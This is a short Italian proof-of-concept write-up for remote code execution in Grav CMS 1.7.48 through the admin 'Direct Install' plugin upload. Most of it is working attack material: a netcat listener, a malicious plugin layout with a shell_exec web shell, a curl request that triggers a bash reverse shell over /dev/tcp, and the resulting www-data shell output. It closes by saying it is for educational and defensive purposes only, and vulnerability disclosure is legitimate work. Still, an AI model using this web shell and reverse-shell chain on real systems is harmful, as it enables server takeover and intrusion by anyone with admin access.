
Grav CMS v1.7.48 con Admin Plugin v1.10.48 è vulnerabile a Remote Code Execution (RCE) tramite la funzionalità di upload dei plugin "Direct Install", consentendo ad amministratori autenticati di eseguire codice PHP arbitrario sul server.
/admin/tools/direct-install (Pannello di amministrazione > Strumenti > Installazione diretta)Preparare un listener:
nc -lvnp 4444
Accedere al Pannello di amministrazione di Grav come amministratore.
Andare su Tools > Direct Install
Caricare un plugin ZIP malevolo (evilplugin.zip) strutturato come segue:
evilplugin/
├── evilplugin.php ← contains: shell_exec($_GET['cmd'])
└── blueprints.yaml ← minimal blueprint to pass validation
Innescare la reverse shell:
curl --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/host.docker.internal/4444 0>&1'" http://<target>/
Reverse shell ricevuta:
$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on <target-ip>
www-data@target:/var/www/html$ whoami
www-data
/admin/tools/direct-installSolo per scopi educativi e difensivi.